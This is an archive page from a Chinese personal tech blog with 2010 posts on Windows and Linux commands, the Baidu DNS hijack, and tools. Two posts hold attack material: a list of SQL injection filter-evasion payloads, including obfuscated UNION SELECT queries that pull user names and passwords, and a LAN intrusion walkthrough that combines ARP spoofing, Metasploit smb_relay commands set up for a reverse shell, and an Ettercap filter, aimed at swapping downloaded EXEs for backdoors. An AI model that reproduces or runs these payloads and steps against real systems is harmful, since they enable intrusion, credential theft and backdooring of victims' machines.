Author: 坏人咖啡

Real Name:

Profile:

Website:

Posts by 坏人咖啡

历时三个月才拿到手的Google的PIN码!

date 15 1月 2010 | category 心情随笔

其实PIN码很早就过了,但是PIN码的邮件一直没有收到,原来早就到了,只是公司没有派发,这封信在公司呆了三个月昨天终发到我手上了,特此拍照留念一下!

图中的个人地址和信息擦掉了,防止有些人社工:)

net use命令详细的使用方法

date 14 1月 2010 | category 学习笔记,工具收集

net share abc$=c:\
将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)
net share c$ /del
禁止C$共享
net use z: \\*.*.*.*\C$
把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘
net use c: /del
删除映射的c盘
net use * /del /y
删除全部
net start
显示本地主机当前服务
net start telnet
启动 Telnet 服务
net start Server
启动 Server 服务 (IPC$ 和共享要*这个服务)
net stop Messenger
停止信使服务(不会在有烦人的Win的弹出广告了)!
net stop server
停止Server …

常用CMD命令

date 14 1月 2010 | category 学习笔记

gpedit.msc—–组策略
sndrec32——-录音机
Nslookup——-IP地址侦测器
explorer——-打开资源管理器
logoff———注销命令
tsshutdn——-60秒倒计时关机命令
lusrmgr.msc—-本机用户和组
services.msc—本地服务设置
oobe/msoobe /a—-检查XP是否激活
notepad——–打开记事本
cleanmgr——-垃圾整理
net start messenger—-开始信使服务
compmgmt.msc—计算机管理
net stop messenger—–停止信使服务
conf———–启动 netmeeting
dvdplay——–DVD播放器
charmap——–启动字符映射表
diskmgmt.msc—磁盘管理实用程序
calc———–启动计算器
dfrg.msc——-磁盘碎片整理程序
chkdsk.exe—–Chkdsk磁盘检查
devmgmt.msc— 设备管理器
regsvr32 /u *.dll—-停止dll文件运行
drwtsn32—— 系统医生
rononce -p —-15秒关机
dxdiag———检查DirectX信息
regedt32——-注册表编辑器
Msconfig.exe—系统配置实用程序
rsop.msc——-组策略结果集
mem.exe——–显示内存使用情况
regedit.exe—-注册表
winchat——–XP自带局域网聊天
progman——–程序管理器
winmsd———系统信息
perfmon.msc—-计算机性能监测程序
winver———检查Windows版本
sfc /scannow—–扫描错误并复原
taskmgr—–任务管理器(2000/xp/2003)

linux zip命令

date 12 1月 2010 | category Linux,学习笔记

在 shell 提示下压缩文件
压缩文件使用较少磁盘空间,并且比未压缩的大文件下载速度要快。在 Red Hat Linux 中,你可以使用的文件压缩工具有:gzip、bzip2、和 zip。

推荐你使用 bzip2 压缩工具,因为它提供了最大限度的压缩,并且可在多数类似 UNIX 的操作系统上找到。gzip 压缩工具也可以在类似 UNIX 的操作系统上找到。如果你需要在 Linux 和其它操作系统如 MS Windows 间传输文件,你应该使用 zip,因为该命令与 Windows 上的压缩工具最兼容。

injection techniques to anti bypass翻译

date 12 1月 2010 | category 学习笔记

作者:Mickey

injection_techniques_to_anti_bypass 翻译

1.
or 1=1经urlencode编码后%6f%72%20%31%3d%31

2.
移除空格or’swords’=’swords’(仅对mssql)

3.
使用字符串or’sword’=’swords’替代经典的or 1=1

4.
’swords’=N’swords’ (仅对mssql)

5.
’swords’=’sw’+’ords’
exec(‘in’+’sert into’+’…’)

6.
使用like绕过’=’,’>’限制
or’swords’ like ’sw’

7.
使用IN绕过
or ’swords’ IN (’swords’)

8.
使用BETWEEN绕过
or ’swords’ BETWEEN ‘rw’ AND ‘tw’

9.
or ’swords’>’sw’
or ’swords’<’tw’

10.
使用/**/替代空格,分割敏感的字符
UNION/**/SELECT/**/user,pwd from tbluser
U/**/NION/**/SE/**/LECT/**/user,pwd from tbluser

11.
使用16进制

百度今天杯具了!

date 12 1月 2010 | category 心情随笔

今天早上到公司习惯性的打开网页,后来发现百度竟然打不开了,接着就不停的出现一个Cpanel的页面!

下面是来自Cnbeta的消息

今天早上7时许,百度出现访问中断的情况,查询域名baidu.com的WHOIS信息后发现百度域名出现不可理解的问题。
目前Baidu.com的DNS服务器被更换,同时主域名已经被解析到一个荷兰的IP,并且访问百度旗下子域名会被跳转到雅虎的错误页面,WHOIS数据也正在不断被刷新中,目前问题并未解决,百度也并没有对此发表回应。

8:20更新:有网友曾经被定向到一个黑页“Iranian Cyber Army”上,域名被盗取或劫持的可能性相当大,不过百度如此大的请求数量是任何一个黑页服务器也无法抵御的,因此只能是访问失败。

回想起twitter上次域名被转向,和这次攻击有着惊人的相似。

8:30更新:百度DNS数据已经被改回,但WHOIS数据依然没有刷新

8:36更新:被黑图像出现,果然是伊朗网军。


Domain Name: BAIDU.COM
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: YNS1.YAHOO.COM
Name Server: YNS2.YAHOO.COM
Status: ok
Updated Date: 11-jan-2010
Creation Date: 11-oct-1999
Expiration Date: 11-oct-2014

Registrant:
Domain Discreet
ATTN: baidu.com
Rua Dr. Brito Camara, n 20, 1
Funchal, Madeira 9000-039
PT
Phone: 1-902-7495331
Email: 036f37850a14115101201f9483195f63@domaindiscreet.com

Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: www.register.com

Domain Name: baidu.com
Created on…………..: 1999-10-11
Expires on…………..: 2014-10-11

Administrative Contact:
Domain Discreet
ATTN: baidu.com
Rua Dr. Brito Camara, n 20, 1
Funchal, Madeira 9000-039
PT
Phone: 1-902-7495331
Email: 036f376a0a14115100199c0316d64ebb@domaindiscreet.com

Technical Contact:
Domain Discreet
ATTN: baidu.com
Rua Dr. Brito Camara, n 20, 1
Funchal, Madeira 9000-039
PT
Phone: 1-902-7495331
Email: 036f37860a14115101c8a6d69ced14a8@domaindiscreet.com

DNS Servers:
yns1.yahoo.com
yns2.yahoo.com

可怜的百度,伊朗网军国然很嚣张!

早晚会有人收拾他们!

Have Fun With Ettercap Filter In LAN

date 11 1月 2010 | category 学习笔记

作者:Mickey
前几天pt007 带我去玩,在车上讨论了下内网入侵的思路,当时说到了利用ARP 欺骗加上smbrelay
来得到主机cmdshell 的方法,又提到了一个当用户通过浏览器下载EXE 文件的时候,利用ARP 欺骗
把数据流都引到本地,然后替换成我们事先准备好的后门,再转发出去,这样当目标运行了下载的EXE
后,我们就能得到主机的访问权限了,今天下午正好无事,就找了找资料,测试了下,顺带的也学了
学Ettercap 的使用。
一.Ettercap+SMBRELAY
还是先说一下我的渗透测试平台,我用的是Ubuntu9.04,Ettercap 0.7.3,MetaSploit 3.2,我们先用
MetaSploit 里的SmbRelay 来监听本地的445,使用之前,如果本地有Samba 服务在运行的话,需要
先关闭,否则会造成端口冲突的。首先运行msfconsole,命令如下:
sudo ./msfconsole
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.52
set LPORT 53
exploit
这里我选择的payload 是反向连接到本地的53 端口的,运行效果如图:
接下来,我们编写Ettercap 的Filter,过滤脚本内容如下:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,”Accept-Encoding”)) {
replace(“Accept-Encoding”,”Accept-Mousecat”);
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == …

Beyond Compare

date 11 1月 2010 | category 工具收集

今天从某位大牛的一个图片中看到的,感觉挺有意思的一个东西,就收集一下。

以下是该软件的介绍:

Beyond Compare 是一款不可多得的专业级的文件夹和文件对比工具。使用他可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。对软件汉化者来说,这绝对是一款不可多得的工具。

本地下载:HA-BCompare-v3.19

远程地址:http://www.crsky.com/soft/2975.html